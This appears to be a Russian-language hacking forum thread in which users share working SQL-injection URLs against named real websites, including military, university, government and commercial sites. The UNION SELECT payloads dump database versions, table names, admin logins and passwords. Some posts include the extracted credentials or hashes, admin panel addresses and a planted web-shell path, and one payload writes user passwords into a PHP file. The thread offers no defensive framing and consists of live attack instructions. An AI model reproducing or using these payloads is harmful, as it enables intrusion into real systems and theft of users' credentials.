http://mirlestnic.mirlestnic-vrn.ru/site.php?id=-1+union+select+user(),version(),3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
http://www.fertiligene.com/page.php?coul=1&pos=4&pos2=1&idproduit=-150+union+select+table_n ame+from+information_schema.tables+limit+1,1/* takje iuzaite information_schema.columns i budet vam s4ast'e..i ne zabivaite pro limit..
http://omk.ru/ru/press/news/index.php?id9=1172+AND+NEWS.VERSION=0+AND+NEWS.LANG_ID=1+and+substring(version(),1,1)=%223%22 version: 3.23.58 user: omk хм.. впервые встретил третью версию. Хотелось бы с ней поекспериментирвать, но никакого намека на таблицы не встретил
http://artnow.ru/requestprice.php?picture_id='+union+select+0,concat(id,char(58),login,char(58),email,char(58),pswd,char(58),is_user),2,3,4+from+_user+where+email='[email protected]'/* http://laptopik.ru/catalog.php?id1=-1+union+select+0,1,2,3,4,5,6,7,8,9/* http://rishelie.ru/pages/galery.php?gid=-1+union+select+0,concat(id,char(20,58,20),name,char(20,58,20),login,char(20,58,20),password),2,3,4,5,6,7,8+from+std_users+where+id=43/* (шелл http://rishelie.ru/img_tmp/catalog_910_777.php) http://wplanet.ru/index.php?show=news&id=36&dep=-1+union+select+0,1,concat(id,char(20),name,char(20),login,char(20),pass),3,4+from+users/* еще завалялось, может чтот уже не пашет) http://www.canadianheli-skiing.com/forum-comment.php?id=-1+union+select+0,1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+limit+16,1/* > admin, availablity, forums, users http://www.canadianheli-skiing.com/forum-comment.php?id=-1+union+select+0,1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=users/* http://www.thesimexchange.com/community-comment.php?id=-1+union+select+0,1,2,3,4,5,6,7,8,9+from+accounts/* http://intranet.library.arizona.edu/spendingReduction/comment.php?id=-1+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* http://blog.orskov.net/comment.php?id=9999999+union+select+0,1,2,3,4,5,6/* http://se-center.pl/articles.php?topic=0+union+select+1,concat(id,char(58),nick,char(58),pass),3,4,5+from+jp_admins+limit+0,2/* http://bayoupublishing.com/?file=static_content&page_id=-1+union+select+0,vemail,2,vpassword,4,5+from+admin/* http://georgiatechrugby.com/wraps/score.php?id=-1+union+select+0,1,2,3,4,5,6,7,DATABASE(),9/* http://gop-online.com.ua/index4room.php?Subject=ListUsers&UserId='+union+select+concat(UserId,char(58),UserPassword)+from+users+into+outfile+'content/1.php'/*
Центральное командование ВС США http://www.centcom.mil/index.php?option=com_multimedia&task=view&id=-108+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users/*&Itemid=65&lang=ru 8)
http://www.techboard.ru/thread.php?cid=-11+union+select+concat_ws(0x3a,version(),database(),user())/* http://www.i-market.ru/newsleech/?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6/*
http://msk.geometria.ru/index.php?show=newstruct&newstruct=8+un ion+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),user(),database()),11/* version(): 5.0.22-log user(): [email protected] database(): geometria
_http://davalka.com.ua/page1.php?nag=-27+uni on+select+1,2222,3,4,concat_ws(0x3a,table_schema,table_name,column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,233333,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,5333,54,55,56+from+information_schema.columns/*&te=8
_http://www.nin.ru/articles/?id=-1+union+select+1,2,concat_ws(0x3a,name,email)+from+users/* version:5.0.32-Debian_7etch5-log не особо копался! Поле не имеет ограничений - нету гемора с лимитом!
Автозапчасти Code: http://www.avtozapchasty.ru/autobook/rubr.php?idcbrand=-26+UNION+SELECT+1,aes_decrypt(aes_encrypt(version(),0x71),0x71),3,4,5/*
http://www.eartcenter.ru/content.php?cat_id=1&id=4+union+select+1,2,version(),4,5,6/* =========== [email protected] 4.1.21-log eartcenterru =========== зы мой первый самастаятельный шаг в скулях и наткнулся на 4х а я умею токо с схемой табл. переберать может мне ктото дать инфы или росказать как переберать таблицы в 4х версиях сменя плусекии)
http://www.peaceforum.pk/pages/article_details.php?d_id=-2+union+select+1, 2,table_name,4,5+from+information_schema.t ables/* http://www.peaceforum.pk/pages/article_details.php?d_id=-2+union+select+1,2,co lumn_name,4,5+from+information_schema.columns+where+table_name=0x6 d656d62657273+/* version : 5.0.45-community user : caravaan_naveed@localhost database : caravaan_peace
http://www.fwo.com.pk/galleries.php?page=4&type=viewEvents&gid=-1+union+select+1,2 ,3,4,5,6/* version: 4.1.22-standard user : fwo_fwo@localhost database : fwo_fwo
http://brianoshomedecor.com/category.php?parentId=-162+union+select+1,table_name,3+from+information_schema.tabl es/* http://brianoshomedecor.com/category.php?parentId=-162+union+select+1,colum n_name,3+from+information_schema.columns+where+table_name=0x7573657273/* http://brianoshomedecor.com/category.php?parentId=-162+union+select+1,concat_ws(0x3a,id,login,password),3+from+users/* admin: 1million http://brianoshomedecor.com/admin/login.php kinderi go go go ... =)
Code: http://www.fischeraudio.ru/profile.php?id=-20+union+select+1,concat_ws(0x2F,version(),user()),concat_ws(0x2F,login,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+admins/* Version: 5.0.45-log/[email protected] Admins: Admin 06d961d7ed6f6ee3b9734101f3b26dd3
http://www.primaria-navodari.ro/?do=anunt&no=-40+union+select+1,2,3 ,4,5,6-- version: 5.0.45-community user: primaria_root@localhost database: primaria_primaria запрос : http://www.primaria-navodari.ro/?do=anunt&no=-40+union+select+1,2,table_name,4,5 ,6+from+information_schema.tables/* выбросил меня на страничку Nr=406 Not Acceptable подставив from+users-- ошибки не было,тогда я попробовал: http://www.primaria-navodari.ro/?do=anunt&no=-40+union+select+1,2 ,concat_ws(0x3a,user,0x3a,pass),4,5,6+from+users/* все нормально .... admin:vFO1gTxJZCdiwlExlAVSPjmeYXY админка: http://www.primaria-navodari.ro/index.php?do=page&no=a
